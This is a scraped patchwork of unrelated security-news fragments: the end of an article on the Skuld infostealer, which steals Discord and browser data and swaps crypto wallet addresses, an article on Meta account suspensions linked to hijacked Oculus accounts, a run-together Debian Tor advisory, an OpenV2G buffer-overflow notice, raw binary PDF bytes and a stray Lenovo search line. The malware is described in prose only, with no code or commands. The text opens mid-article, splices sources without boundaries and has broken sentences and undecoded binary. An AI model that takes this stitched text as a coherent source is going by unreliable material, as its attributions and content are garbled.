If a match is found, the malware terminates the matched process instead of ending itself. It exfiltrates data through an actor-controlled Discord webhook. It may also use the Gofile upload service to steal the uploaded ZIP file through a reference link. The stolen data is sent to the attacker via the same Discord webhook.

****Golang-based Skuld has Traces of Different Malware****

Further probing revealed that its developer, Deathined, based this infostealer on open-source malware samples/projects such as BlackCap Grabber, Creal Stealer, and Luna Grabber and built it on Golang 1.20.3. The author used multiple libraries for its numerous support tasks.

Researchers noted that the malware developer had created accounts on GitHub, Twitter, Tumblr, Reddit, and other social media platforms, supposedly for Skuld’s promotion. Trellix researchers also discovered a Telegram group called Deathinews, where the author might offer Skuld for sale to other cybercriminals.

Github account of Deathined (Trellix)

****Skuld Capabilities****

Skuld info stealer can collect system metadata, harvest cookies and credentials from web browsers, and looks for files in Windows PC’s user profile folders, e.g., Desktop, Documents, OneDrive, Music, Videos, and Pictures.

Furthermore, it can corrupt authentic files from Discord Token Protector and Better Discord and inject JavaScript code into the Discord app to steal backup codes. A clipper module was also found in Skuld samples that can modify clipboard content. Moreover, it can swap wallet addresses with attackers to steal cryptocurrency.

**RELATED ARTICLES**

1.  Malware-infected browser extensions stealing Chrome
2.  Bandit Stealer hits Windows devices to steal browser data
3.  Telegram and Discord Bots Delivering Infostealing Malware
4.  PureCrypter Malware Targets Governments Through Discord
5.  Pink Drainer Posed as Journalists, Stole $3M from Discord Users

Windows Users Alert: Skuld Malware Steals Discord and Browser Data

By Deeba Ahmed
META is suspending accounts of users on Facebook and Instagram, potentially linked to malicious Vietnamese activity involving META's Oculus.
This is a post from HackRead.com Read the original post: Linked Oculus Accounts Trigger Facebook and Instagram Suspension

Experiencing a sudden Facebook or Instagram account suspension? You’re not alone. Suspicious activity on Oculus accounts linked to META users is going unaddressed as META opts for suspensions instead of addressing the root cause.

Multiple posts on social media platforms like Reddit suggest a sudden rise in Facebook and Instagram account suspensions, causing frustration among users, mainly because they are clueless about why this is happening.

Many users claim their accounts were suspended without warning or explanation, leaving them unaware of the alleged violation. Users complained about seeing a suspension message from Meta that read:

“Your account was suspended because your linked Meta account doesn’t follow our rules. Log into your linked auth.oculus.com account to appeal our decision.”

Users are confused and frustrated due to Meta’s lack of transparency about suspension reasons and limited appeal options whereas the lack of communication from Meta regarding the suspensions is making it difficult to understand and address the situation.

Reddit user r/facebookdisabledme posted: “Facebook suspended my account without giving any specific reason. Trying to appeal is proving to be extremely difficult.”

Users on Facebook, Instagram, and Reddit are reporting a connection between suspensions and their linked Oculus accounts, indicating a potential security issue within the VR platform. Further probing reveals that Vietnamese hackers could be exploiting vulnerabilities in the Oculus Meta system, which was acquired by Meta in 2014.

“There were 2 logins from Vietnam into my account (I’m from Belgium). Most likely that’s why Facebook suspended the account immediately? But I didn’t get any recovery mail or explanation” user u/Mammoth\_Resolution\_7 shared on Reddit.

One user claimed the hacker linked Meta Horizon account to his Facebook and another reported linking of Meta Oculus. 

According to sources, hackers are creating Oculus Meta accounts and linking them to victims’ social media accounts, registering them as unauthorized access, which is leading to thousands of account suspensions.

For your information, Meta introduced Meta Accounts in 2022 to allow the decoupling of Quest users’ devices from their Facebook profiles. This change was deemed inevitable as it prevented users from losing access to their Oculus Meta account if their Facebook account was banned. However, multiple accounts are still linked, affecting many Facebook or Instagram accounts’ safety.

It is also worth noting that Vietnamese cybercriminals have a history of targeting META and business pages on the platform, with instances of **using DarkGate malware** to steal login credentials.

Nevertheless, META almost member addresses why it suspends user accounts. However, to avoid account suspensions, users should review Meta’s Community Standards, check for official announcements on their website or social media platforms, contact Meta Support through their official channels, and be patient and persistent in navigating the appeal process.

Meta should provide clear communication and address concerns promptly and transparently, as it is crucial for users to understand the specific reason for their account suspension and to be patient and persistent in their efforts to reach out to them.

1.  **Vietnamese Group Hacks and Sells Bedroom Camera Footage**
2.  **Vietnamese man hacked Aussie airport systems; stole security data**
3.  **Fake ChatGPT and AI pages on Facebook are spreading infostealers**
4.  **New Phishing Scam Hooks META Businesses with Trademark Threats**
5.  **Provocative Facebook Ads Leveraged to Deliver NodeStealer Malware**

Linked Oculus Accounts Trigger Facebook and Instagram Suspension

Debian Linux Security Advisory 5562-1 - It was discovered that Tor was susceptible to a crash during handshake with a remote relay, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5562-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 22, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : torCVE ID         : not yet availableIt was discovered that Tor was susceptible to a crash during handshakewith a remote relay, resulting in denial of service.For the oldstable distribution (bullseye), support for tor is nowdiscontinued. Please upgrade to the stable release (bullseye) to continuereceiving tor updates.For the stable distribution (bookworm), this problem has been fixed inversion 0.4.7.16-1.We recommend that you upgrade your tor packages.For the detailed security status of tor please refer toits security tracker page at:https://security-tracker.debian.org/tracker/torFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVeVPMACgkQEMKTtsN8TjbMIA/9EhW1HGw07Hn4iLfT369mukHIEN8TNTS1hGwRKJAf0yZFnqdqdKJ7EsBINIh8LlaHxq09JmMN92oMSvenMMrmpCYCRL2UicPTO59ChueUmIH9gLgr1EqWly2b/A09bfCc3TXA35XDzdFWHuI6k6BV6YVQXfeJP4Xxqg+wrYoXSKq1urhtCIT8+11mmylwKsE0uaIAatMhpLRDPCc4yp0brQTklup+bn7GMpgQbbyuPHazJMYmU7qgRh2u9KPa7XMTt1mpx/b55TRQ2EatVwpHukY131putTfV195i96yD/wECZ9R/ey/maF17EGDq+FtnTus1ePuZmV5eVAZRe1+4wOlUoUggVysJUsor6CYIJ0gTwdozXRzFfR4nkfF+odUBhJAivLvPi9UB0iLo3o3c0l83l0tHRsCVC3TtBo1svo8Q4Ri9p8U1ajmKh8AaNHzGgxwdmot5vbTkyO/Hy4tR7Z3PTWne2OsiL0NcQdQZ1/Cxbcr0h3BFF0fkYtQhG4pMa7luQxQC4GSAVQqKqB4IR4RnSHflCpQcbNm3g9UyYv6G4m6RmVfRuSlaG04TOz3MkLqzdn3iKLsyMbQw2Ojq6CWRUYa4QazjIb6owFjQnarUGKDxlnKtJW2W4IJVCi0Wgt2HwmgCtXjOEqtyhdPhlCGNEViocseong99Mz0Sm6E==H3jh-----END PGP SIGNATURE-----

Debian Security Advisory 5562-1

A vulnerability has been identified in OpenV2G (V0.9.4). The OpenV2G EXI parsing feature is missing a length check when parsing X509 serial numbers. Thus, an attacker could introduce a buffer overflow that leads to memory corruption.

%PDF-1.5 %���� 1 0 obj << /D \[2 0 R /XYZ 70.866 771.024 null\] >> endobj 3 0 obj << /D \[2 0 R /XYZ 70.866 646.963 null\] >> endobj 4 0 obj << /D \[2 0 R /XYZ 70.866 598.838 null\] >> endobj 5 0 obj << /D \[2 0 R /XYZ 70.866 479.608 null\] >> endobj 6 0 obj << /D \[2 0 R /XYZ 70.866 420.525 null\] >> endobj 7 0 obj << /D \[8 0 R /XYZ 85.039 479.479 null\] >> endobj 9 0 obj << /D \[8 0 R /XYZ 70.866 195.109 null\] >> endobj 10 0 obj << /S /GoTo /D \[2 0 R /Fit\] >> endobj 2 0 obj << /Contents 11 0 R /Type /Page /Resources 12 0 R /Parent 13 0 R /Annots \[14 0 R 15 0 R 16 0 R 17 0 R 18 0 R 19 0 R\] /MediaBox \[0 0 595.276 841.89\] >> endobj 14 0 obj << /A << /S /URI /Type /Action /URI (https://sourceforge.net/projects/openv2g/) >> /C \[0 1 1\] /Subtype /Link /Type /Annot /H /I /Border \[0 0 0\] /Rect \[303.117 497.876 484.993 510.783\] >> endobj 15 0 obj << /A << /S /GoTo /D (section\*.2) >> /Subtype /Link /C \[1 0 0\] /Type /Annot /H /I /Border \[0 0 0\] /Rect \[386.143 437.342 524.579 448.878\] >> endobj 16 0 obj << /A << /S /GoTo /D (section\*.4) >> /Subtype /Link /C \[1 0 0\] /Type /Annot /H /I /Border \[0 0 0\] /Rect \[147.498 419.529 309.548 430.946\] >> endobj 17 0 obj << /A << /S /URI /Type /Action /URI (https://www.siemens.com/cert/operational-guidelines-industrial-security) >> /C \[0 1 1\] /Subtype /Link /Type /Annot /H /I /Border \[0 0 0\] /Rect \[164.798 328.453 487.754 339.989\] >> endobj 18 0 obj << /A << /S /URI /Type /Action /URI (https://www.siemens.com/industrialsecurity) >> /C \[0 1 1\] /Subtype /Link /Type /Annot /H /I /Border \[0 0 0\] /Rect \[406.699 298.684 525.406 310.102\] >> endobj 12 0 obj << /ProcSet \[/PDF /Text\] /Font << /F51 20 0 R /F48 21 0 R >> >> endobj 11 0 obj << /Filter /FlateDecode /Length 2127 >> stream xڵYKs�6��W�TUopn��rv<�J�S��8-s�����ʿ�n�I�b8��\`����|� E�\*��Og?���? �$VL��@G�(�8&��\`����,ݤ�b4fڄ�t��Gc\*ì�� M�/Y��A�~��������r�(/��#�z>�}������gE} ��4Xlξ�Kx�K���~� ��D ��\`v����+U\]2Q=-��i��8����4���B뺁dL�2�@��Xsō��^!\*%�l�⒀�k�%��$B�(��OUD�4Mn� �����)�\`��4�Kݡ��:D�f��Se)������s����ML��'��9�bP���R��Ym�?�T���4O�gk�W��ZF�)Zp�� �2btܧ ��&5=����d~+�� ��Y�6a�>����bo�H�ǜ/ ��\* P�����u�HlZ��L��p�,dc�H��E@�RC��韓�tsn�Ԕ�%}���<���#�i^��0\[PC�J��=�fn�'�����'��.GZ�"����J@�Ъ��г|����ƥJ2�M����L�#����-���X�!�/���������؁O��n�/�h�{,\_G���܏T���ݶL2���)q�k���#N��nl�2^FL�ȷ(���W���n�pi�����))�U��\_b�����d��2Y��?�nl%HE \\�S��9�>3�V)�$�q������\[G��)��UX7�S�o�t�B�,�|�{���S��(��蛥��e%m���\*K/�Ҥ.�\]%j ��-�PTJtF�b���VCb�D�T�D�o��ǏW�ˎ��b�!+C>\`�+�sF(^Q�%���035��M1�n/�/� 0��T�E� � �o�W�n�\[��a{Ơ�9 8c��8��H�GaB�&�������헎��fJ9�s q��F��W����� "�AE�D��d������U��6js�~ח�qưh���< k~e�Zۢ-"(��m�g���"����6 -z����-Cd��#�b0%7��=Xl��'�G�C4-2>\_fIw�,!J5 ?����B������PxJկ�".b���l�}TQ݋l��ыl|�g���N ��,n{���F��g�C���w$V�I��\*oc��ߥX�����5mU�Oe�\\|8?w���V)n/�M���|�\_ؗŹ-�\`O����q�T���6yV(!R���

Search

lenovo warranty check/lookup | check warranty status | lenovo support us